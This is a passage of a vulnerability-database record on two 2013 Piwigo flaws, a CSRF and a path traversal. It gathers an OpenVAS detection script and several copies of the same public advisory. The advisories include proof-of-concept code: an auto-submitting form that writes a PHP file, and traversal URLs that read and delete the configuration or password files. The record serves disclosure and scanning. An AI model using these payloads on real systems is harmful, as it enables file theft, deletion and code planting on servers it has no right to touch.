"cpe:2.3:a:piwigo:piwigo:1.6.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:piwigo:piwigo:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:27:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "This host is installed with Piwigo and is prone to cross site\n request forgery and path traversal vulnerabilities.", 
"modified": "2020-05-08T00:00:00", "published": "2013-03-21T00:00:00", "id": "OPENVAS:1361412562310803340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803340", "type": "openvas", "title": "Piwigo Cross Site Request Forgery and Path Traversal Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Piwigo Cross Site Request Forgery and Path Traversal Vulnerabilities\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:piwigo:piwigo\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803340\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(58016, 58080);\n script_cve_id(\"CVE-2013-1468\", \"CVE-2013-1469\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-21 13:40:26 +0530 (Thu, 21 Mar 2013)\");\n script_name(\"Piwigo Cross Site Request Forgery and Path Traversal Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_piwigo_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"piwigo/installed\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Feb/152\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/24561\");\n script_xref(name:\"URL\", value:\"http://www.htbridge.com/advisory/HTB23144\");\n script_xref(name:\"URL\", value:\"http://piwigo.org/releases/2.4.7\");\n\n script_tag(name:\"insight\", value:\"- Flaw in the LocalFiles Editor plugin, it does not require multiple steps\n or explicit confirmation for sensitive transactions.\n\n - Input passed via 'dl' parameter to install.php is not properly sanitized before being used.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Piwigo version 2.4.7\");\n\n script_tag(name:\"summary\", 
value:\"This host is installed with Piwigo and is prone to cross site\n request forgery and path traversal vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to create arbitrary PHP\n file or to retrieve and delete arbitrary files in the context of the\n affected application.\");\n\n script_tag(name:\"affected\", value:\"Piwigo version 2.4.6 and prior\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nurl = dir + '/install.php?dl=/../../local/config/ovtestlmn678.php';\n\n# Actual file, '/database.inc.php' gets deleted and information cannot be fetched.\n# Hence we are using dummy file 'ovtestlmn678.php' to check the\n# response. 
The patched version of application will generate a different\n# response.\n\nif( http_vuln_check( port:port, url:url, check_header:TRUE,\n pattern:\"Piwigo is already installed\" ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-15T21:19:41", "edition": 2, "description": "Piwigo version 2.4.5 suffers from cross site request forgery and path traversal vulnerabilities.", "published": "2013-03-01T00:00:00", "type": "zdt", "title": "Piwigo 2.4.6 Cross Site Request Forgery / Traversal Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-03-01T00:00:00", "id": "1337DAY-ID-20461", "href": "https://0day.today/exploit/description/20461", "sourceData": "Product: Piwigo\r\nVendor: Piwigo project\r\nVulnerable Version(s): 2.4.6 and probably prior\r\nTested Version: 2.4.6\r\nVendor Notification: February 6, 2013 \r\nVendor Patch: February 19, 2013 \r\nPublic Disclosure: February 27, 2013 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\r\nCVE References: CVE-2013-1468, CVE-2013-1469\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\r\n\r\n\r\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP 
request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\r\n\r\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\">\r\n<input type=\"hidden\" name='edited_file' value='file.php'>\r\n<input type=\"hidden\" name='text' value=' phpinfo(); '>\r\n<input type=\"hidden\" name='submit' value='1'>\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.submit();\r\n</script>\r\n\r\n\r\nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default).\r\n\r\n\r\n2) Path Traversal in Piwigo: CVE-2013-1469\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\r\n\r\n\r\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n{\r\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n ...\r\n echo file_get_contents($filename);\r\n ...\r\n}\r\n\r\n\r\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. 
\r\nImportant: after being read the file is deleted (if web server has write permission to it).\r\n\r\n\r\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\r\n\r\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Piwigo 2.4.7\r\n\r\nMore Information:\r\nhttp://piwigo.org/releases/2.4.7\r\nhttp://piwigo.org/bugs/view.php?id=0002843\r\nhttp://piwigo.org/bugs/view.php?id=0002844\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\r\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20461"}], "exploitdb": [{"lastseen": "2016-02-02T23:32:06", "description": "Piwigo 2.4.6 - Multiple Vulnerabilities. CVE-2013-1468,CVE-2013-1469. 
Webapps exploit for php platform", "published": "2013-03-01T00:00:00", "type": "exploitdb", "title": "Piwigo 2.4.6 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-03-01T00:00:00", "id": "EDB-ID:24561", "href": "https://www.exploit-db.com/exploits/24561/", "sourceData": "Advisory ID: HTB23144\r\nProduct: Piwigo\r\nVendor: Piwigo project\r\nVulnerable Version(s): 2.4.6 and probably prior\r\nTested Version: 2.4.6\r\nVendor Notification: February 6, 2013 \r\nVendor Patch: February 19, 2013 \r\nPublic Disclosure: February 27, 2013 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\r\nCVE References: CVE-2013-1468, CVE-2013-1469\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\r\n\r\n\r\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. 
A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\r\n\r\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\">\r\n<input type=\"hidden\" name='edited_file' value='file.php'>\r\n<input type=\"hidden\" name='text' value=' phpinfo(); '>\r\n<input type=\"hidden\" name='submit' value='1'>\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.submit();\r\n</script>\r\n\r\n\r\nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default).\r\n\r\n\r\n2) Path Traversal in Piwigo: CVE-2013-1469\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\r\n\r\n\r\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n{\r\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n ...\r\n echo file_get_contents($filename);\r\n ...\r\n}\r\n\r\n\r\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. 
\r\nImportant: after being read the file is deleted (if web server has write permission to it).\r\n\r\n\r\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\r\n\r\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Piwigo 2.4.7\r\n\r\nMore Information:\r\nhttp://piwigo.org/releases/2.4.7\r\nhttp://piwigo.org/bugs/view.php?id=0002843\r\nhttp://piwigo.org/bugs/view.php?id=0002844\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\r\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24561/"}, {"lastseen": "2016-02-02T23:28:13", "description": "Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability. CVE-2013-1469. Webapps exploit for php platform", "published": "2013-02-19T00:00:00", "type": "exploitdb", "title": "Piwigo 2.4.6 install.php Remote Arbitrary File Read/Delete Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1469"], "modified": "2013-02-19T00:00:00", "id": "EDB-ID:24520", "href": "https://www.exploit-db.com/exploits/24520/", "sourceData": "Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability\r\n\r\n\r\nVendor: Piwigo project\r\nProduct web page: http://www.piwigo.org\r\nAffected version: 2.4.6\r\n\r\nSummary: Piwigo is a photo gallery software for the web that comes\r\nwith powerful features to publish and manage your collection of\r\npictures.\r\n\r\nDesc: Input passed to the 'dl' parameter in 'install.php' script\r\nis not properly sanitised before being used to get the contents of\r\na resource or delete files. 
This can be exploited to read and delete\r\narbitrary data from local resources with the permissions of the web\r\nserver via directory traversal attack.\r\n\r\n====================================================================\r\n/install.php:\r\n-------------\r\n\r\n113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n114: {\r\n115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n116: header('Cache-Control: no-cache, must-revalidate');\r\n117: header('Pragma: no-cache');\r\n118: header('Content-Disposition: attachment; filename=\"database.inc.php\"');\r\n119: header('Content-Transfer-Encoding: binary');\r\n120: header('Content-Length: '.filesize($filename));\r\n121: echo file_get_contents($filename);\r\n122: unlink($filename);\r\n123: exit();\r\n124: }\r\n\r\n====================================================================\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Apache 2.4.2 (Win32)\r\n PHP 5.4.4\r\n MySQL 5.5.25a\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2013-5127\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php\r\n\r\nVendor Patch: http://piwigo.org/bugs/view.php?id=2843\r\n\r\n\r\n\r\n15.02.2013\r\n\r\n\r\n--\r\n\r\nhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt\r\n\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24520/"}], "freebsd": [{"lastseen": "2019-05-29T18:33:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "\nHigh-Tech Bridge Security Research Lab reports:\n\nThe CSRF vulnerability exists due to insufficient verification of the\n\t HTTP request origin in \"/admin.php\" script. 
A remote attacker can trick\n\t a logged-in administrator to visit a specially crafted webpage and\n\t create arbitrary PHP file on the remote server.\nThe path traversal vulnerability exists due to insufficient filtration\n\t of user-supplied input in \"dl\" HTTP GET parameter passed to\n\t \"/install.php\" script. The script is present on the system after\n\t installation by default, and can be accessed by attacker without any\n\t restrictions.\n\n", "edition": 4, "modified": "2013-02-06T00:00:00", "published": "2013-02-06T00:00:00", "id": "EDD201A5-8FC3-11E2-B131-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/edd201a5-8fc3-11e2-b131-000c299b62e1.html", "title": "piwigo -- CSRF/Path Traversal", "type": "freebsd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "\r\n\r\nAdvisory ID: HTB23144\r\nProduct: Piwigo\r\nVendor: Piwigo project\r\nVulnerable Version(s): 2.4.6 and probably prior\r\nTested Version: 2.4.6\r\nVendor Notification: February 6, 2013 \r\nVendor Patch: February 19, 2013 \r\nPublic Disclosure: February 27, 2013 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\r\nCVE References: CVE-2013-1468, CVE-2013-1469\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\r\n\r\n\r\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: 
CVE-2013-1468\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\r\n\r\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\">\r\n<input type=\"hidden\" name='edited_file' value='file.php'>\r\n<input type=\"hidden\" name='text' value=' phpinfo(); '>\r\n<input type=\"hidden\" name='submit' value='1'>\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.submit();\r\n</script>\r\n\r\n\r\nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default).\r\n\r\n\r\n2) Path Traversal in Piwigo: CVE-2013-1469\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\r\n\r\n\r\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n{\r\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n ...\r\n echo file_get_contents($filename);\r\n ...\r\n}\r\n\r\n\r\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. 
\r\nImportant: after being read the file is deleted (if web server has write permission to it).\r\n\r\n\r\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\r\n\r\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Piwigo 2.4.7\r\n\r\nMore Information:\r\nhttp://piwigo.org/releases/2.4.7\r\nhttp://piwigo.org/bugs/view.php?id=0002843\r\nhttp://piwigo.org/bugs/view.php?id=0002844\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\r\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2013-03-03T00:00:00", "published": "2013-03-03T00:00:00", "id": "SECURITYVULNS:DOC:29128", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29128", "title": "Multiple Vulnerabilities in Piwigo", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0306", "CVE-2013-1665", "CVE-2013-1470", "CVE-2013-0305", "CVE-2013-1468", "CVE-2013-1423", "CVE-2013-1469", "CVE-2013-0253", "CVE-2012-4520"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2013-03-03T00:00:00", "published": "2013-03-03T00:00:00", "id": "SECURITYVULNS:VULN:12923", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12923", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:18", "description": "", "published": "2013-02-28T00:00:00", "type": "packetstorm", "title": "Piwigo 2.4.6 Cross Site Request Forgery / Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-02-28T00:00:00", "id": "PACKETSTORM:120592", "href": "https://packetstormsecurity.com/files/120592/Piwigo-2.4.6-Cross-Site-Request-Forgery-Traversal.html", "sourceData": "`Advisory ID: HTB23144 \nProduct: Piwigo \nVendor: Piwigo project \nVulnerable Version(s): 2.4.6 and probably prior \nTested Version: 2.4.6 \nVendor Notification: February 6, 2013 \nVendor Patch: February 19, 2013 \nPublic Disclosure: February 27, 2013 \nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22] \nCVE 
References: CVE-2013-1468, CVE-2013-1469 \nRisk Level: High \nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks. \n \n \n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468 \n \nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server. \n \nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL: \n \n \n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\"> \n<input type=\"hidden\" name='edited_file' value='file.php'> \n<input type=\"hidden\" name='text' value=' phpinfo(); '> \n<input type=\"hidden\" name='submit' value='1'> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.submit(); \n</script> \n \n \nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default). \n \n \n2) Path Traversal in Piwigo: CVE-2013-1469 \n \nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. 
The vulnerable code is: \n \n \nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])) \n{ \n$filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; \n... \necho file_get_contents($filename); \n... \n} \n \n \nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. \nImportant: after being read the file is deleted (if web server has write permission to it). \n \n \nThe following PoC (Proof of Concept) code will display and delete the application's configuration file: \n \nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to Piwigo 2.4.7 \n \nMore Information: 